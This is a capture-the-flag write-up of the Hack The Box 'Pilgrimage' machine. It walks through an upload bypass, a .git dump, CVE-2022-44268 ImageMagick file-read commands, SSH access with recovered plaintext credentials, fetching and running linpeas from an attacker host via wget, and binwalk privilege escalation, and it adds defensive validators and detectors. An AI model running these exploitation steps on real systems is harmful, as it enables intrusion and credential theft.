Pilgrimage https://md2pdf.netlify.app/

# Pilgrimage

Created: July 6, 2023 11:04 PM Tags: Easy
## Enumeration

```bash
nmap -sCV 10.10.11.219
```
### Webapp
On the home page we can see a file upload form, which could be used for a file upload exploit: https://book.hacktricks.xyz/pentesting-web/file-upload

In the page source of the menu we can see that the backend is using PHP. We can therefore try to upload PHP files and then access them to see whether our code is executed or not.
Here is an example of the PHP file used as a POC of RCE in the app:

```php
<?php
exec('ls', $output);
?>
```
When trying to upload this file you will face an issue: the webapp doesn't allow you to upload a PHP file. This is due to the HTML input tag, which carries an `accept` attribute allowing only PNG and JPEG files.
To bypass this, two techniques could work:

- upload the file with two extensions, such as `file.php.png`
- change the HTML in the browser to accept PHP files, but this only works if the check isn't also done in the backend
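The second bullet is the defender's point: the `accept` attribute is a hint to the browser's file picker, and the request can carry any filename and any bytes. Below is an added example of the server-side check the backend would need; it is illustrative code written for this page, not the application's own upload handler, and the allowed types, the storage naming and the sample inputs are assumptions.

```python
"""Added example: server-side upload checks that the accept attribute cannot provide."""
import secrets

# Extension -> magic-byte prefixes the content must start with (assumed whitelist).
ALLOWED_TYPES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}


def validate_upload(filename: str, content: bytes) -> str:
    """Return the extension to store the file under, or raise ValueError.

    Rejects double extensions such as shell.php.png (the first bypass listed above)
    and content whose magic bytes do not match the claimed type (a PHP file renamed
    to .png fails here even if the extension check were loosened).
    """
    # Strip any path component, whatever separator the client used.
    base = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        raise ValueError("filename must be <name>.<ext> with exactly one extension")
    ext = "." + parts[1]
    if ext not in ALLOWED_TYPES:
        raise ValueError(f"extension {ext} is not allowed")
    if not any(content.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        raise ValueError("content does not match the claimed image type")
    return ext


def accepts(filename: str, content: bytes) -> bool:
    """Boolean wrapper around validate_upload for callers that only need yes/no."""
    try:
        validate_upload(filename, content)
    except ValueError:
        return False
    return True


def storage_name(ext: str) -> str:
    """Server-chosen random filename: the client never influences the stored path."""
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    # Constructed sample inputs: a PNG header padded with zeros, and a PHP stub.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    for name, data in [("holiday.png", png), ("shell.php.png", png),
                       ("shell.png", b"<?php exec('ls'); ?>")]:
        print(name, "->", "accepted" if accepts(name, data) else "rejected")
```

This check is necessary but, as the rest of this box shows, not sufficient: the image that finally works against the server is a perfectly valid PNG, so the component that processes the upload (here ImageMagick) still has to be patched.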
### .git directory exposed
→ index file
### Dump the .git content
Using the git-dumper utility (https://github.com/arthaud/git-dumper) we can retrieve the backend source and look into the files' content.
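An exposed `.git` directory hands over the whole source, and with it the database path and the ImageMagick usage found below. As an added mitigation example (not configuration taken from the box or the writeup), this nginx fragment refuses requests for VCS metadata directories; the surrounding `server` block is assumed.

```nginx
# Added example: never serve VCS metadata. A rewrite-phase return ends the request
# before any static-file handler sees it; 404 avoids confirming the directory exists.
location ~ /\.(git|svn|hg)(/|$) {
    return 404;
}
```

After reloading, a request for `/.git/HEAD` should answer 404 instead of the ref line the dumper relies on.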
As we can see from the `magick` binary, the backend uses ImageMagick to manipulate the images. When looking for ImageMagick exploitation paths on the web I found a few interesting pages:

- https://www.synacktiv.com/en/publications/playing-with-imagetragick-like-its-2016 and https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/ : I didn't manage to make the exploits from these pages work.
- https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC : this one is based on CVE-2022-44268, which works on magick 7.1.0-49. You can check the version of the binary by running:

  ```bash
  ./magick -version
  ```

  However this fails because the binary isn't compatible with my PC architecture (arm64).
→ Therefore I chose to test it the hard way, by creating the image following the POC and seeing whether it works or not. Surprise: it works!
```bash
convert -size 320x240 xc:skyblue input.png
pngcrush -text a "profile" "/etc/hosts" input.png crushed_input.png
exiv2 -pS crushed_input.png # verify the output
### Upload the crushed_input.png image on pilgrimage.htb
### Follow the link that the app responds with and download the image that appears
### Run the following steps on the downloaded image
identify -verbose download.png
python3 -c 'print(bytes.fromhex("<HEX_CONTENT>").decode("utf-8"))'
```
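The whole trick rests on one PNG text chunk whose keyword is `profile`; the vulnerable ImageMagick treats its value as a path to read. From the defender's side that keyword is a cheap thing to look for before an upload ever reaches the converter. The following is an added example written for this page, not code from the box or from any of the linked PoCs: a small PNG chunk walker that validates the file structure (signature, lengths, CRCs) and reports any `tEXt`/`zTXt`/`iTXt` chunk keyed `profile`. The sample images it scans are constructed in code, in the same shape `pngcrush -text` produces.

```python
"""Added example: flag PNG uploads carrying a 'profile' text chunk (CVE-2022-44268 bait)."""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}


def iter_chunks(data: bytes):
    """Yield (type, payload) for each chunk; validate signature, lengths and CRCs."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG: bad signature")
    pos = len(PNG_SIGNATURE)
    while True:
        header = data[pos:pos + 8]
        if len(header) < 8:
            raise ValueError("truncated before IEND")
        length, ctype = struct.unpack(">I4s", header)
        payload = data[pos + 8:pos + 8 + length]
        crc = data[pos + 8 + length:pos + 12 + length]
        if len(payload) != length or len(crc) != 4:
            raise ValueError("truncated chunk body")
        if struct.unpack(">I", crc)[0] != zlib.crc32(ctype + payload):
            raise ValueError(f"bad CRC on {ctype.decode('latin-1')} chunk")
        yield ctype, payload
        pos += 12 + length
        if ctype == b"IEND":
            return


def suspicious_profile_chunks(data: bytes) -> list:
    """Return (chunk_type, keyword, value) for every text chunk keyed 'profile'."""
    findings = []
    for ctype, payload in iter_chunks(data):
        if ctype not in TEXT_CHUNKS:
            continue
        keyword, _, rest = payload.partition(b"\x00")
        if keyword.lower() == b"profile":
            # tEXt values are Latin-1; zTXt/iTXt bodies begin with compression flags,
            # so for those the raw remainder is reported with replacement characters.
            findings.append((ctype.decode("ascii"), keyword.decode("latin-1"),
                             rest.decode("latin-1", "replace")))
    return findings


def scan_png(data: bytes) -> dict:
    """Single entry point for an upload handler: structural validity plus findings."""
    try:
        findings = suspicious_profile_chunks(data)
    except ValueError as exc:
        return {"valid": False, "error": str(exc), "findings": []}
    return {"valid": True, "error": None, "findings": findings}


def _chunk(ctype: bytes, payload: bytes) -> bytes:
    return (struct.pack(">I", len(payload)) + ctype + payload
            + struct.pack(">I", zlib.crc32(ctype + payload)))


def build_sample_png(text_chunks) -> bytes:
    """Constructed 1x1 grayscale PNG carrying the given (keyword, value) tEXt chunks.

    Test fixture only; it mirrors what `pngcrush -text a <keyword> <value>` emits.
    """
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # 1x1, 8-bit grey
    idat = zlib.compress(b"\x00\x00")                     # filter byte + one pixel
    png = PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
    for keyword, value in text_chunks:
        png += _chunk(b"tEXt", keyword.encode("latin-1") + b"\x00" + value.encode("latin-1"))
    return png + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


if __name__ == "__main__":
    print(scan_png(build_sample_png([("Comment", "holiday photo")])))
    print(scan_png(build_sample_png([("profile", "/etc/hosts")])))
```

A rejected upload is only half the story: the same walker run over the *output* images in the shrunk directory would show the `Raw profile type` chunk that carries the leaked bytes, which is the artefact to hunt for when checking whether a server was already hit.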
Here is how you identify the HEX_CONTENT value (shown in the screenshot of the `identify -verbose` output):
After running the Python command to decode the hexadecimal output we can clearly see the content of `/etc/hosts`, the file we referenced in our image.

We can now repeat this to further explore the server we are targeting.
## Initial Access

Looking for an initial access, I tried to read common files to get information about the host:

- `/etc/passwd`
- `/var/db/pilgrimage`
In the `login.php` we collected from the git dump we can see the full path of a database file which is used for authentication.
By retrieving this file we can read the content of the SQLite database. However, when using the standard process given in the POC, the hex decoding to UTF-8 fails, so I ended up using an online tool such as https://www.duplichecker.com/hex-to-text.php or https://gchq.github.io/CyberChef/. We can then read the database content, since SQLite stores its text values unencoded inside the database file, and pick out some default credentials along with the user we created (test:test):

→ emily:abigchonkyboi123

As emily is the user we found in the `/etc/passwd` file, this looks like a very promising initial access to the host via SSH.
```bash
ssh [email protected]
# enter abigchonkyboi123
```

Et voilà.
## First flag

The first flag can be found in the `user.txt` file:

```
d5e6dcc948db1aa7a694d06d1795d506
```
## Host Enumeration

### Linpeas

Being on a Linux host, we run linpeas to automate some of the host enumeration tasks. To do so:

- first download `linpeas.sh` from its webpage: http://linpeas.sh
- put it in a directory you can expose and start a basic Python web server to serve the file:

  ```bash
  python -m http.server 8000
  ```

- from the target, use wget to fetch the script:

  ```bash
  wget <attacker_VPN_IP>:8000/linpeas.sh
  ```

- make the script executable and run it:

  ```bash
  chmod +x linpeas.sh
  ./linpeas.sh
  ```
→ Nothing interesting really pops out
### Pspy
Through pspy we can see that the `malwarescan.sh` script is launched frequently, to make sure that `inotifywait` is running on the `/var/www/pilgrimage.htb/shrunk` directory, waiting for the creation of new files.

Here is the content of `malwarescan.sh` (captured in a screenshot):
We can test this by creating a new file under `/var/www/pilgrimage.htb/shrunk` and watching what happens in pspy:

```bash
touch /var/www/pilgrimage.htb/shrunk/test.sh
```
As we can see, when `inotifywait` catches a new file, the `binwalk` binary is executed on it. By looking at this binary's help output we can find its version, and by googling it we can easily find an exploit that builds an image which gives you root access.
## Privilege Escalation

https://www.exploit-db.com/exploits/51249

→ root shell

```bash
cat /root/root.txt
```

```
7d8c6af104c86b24ec0af8245a93171d
```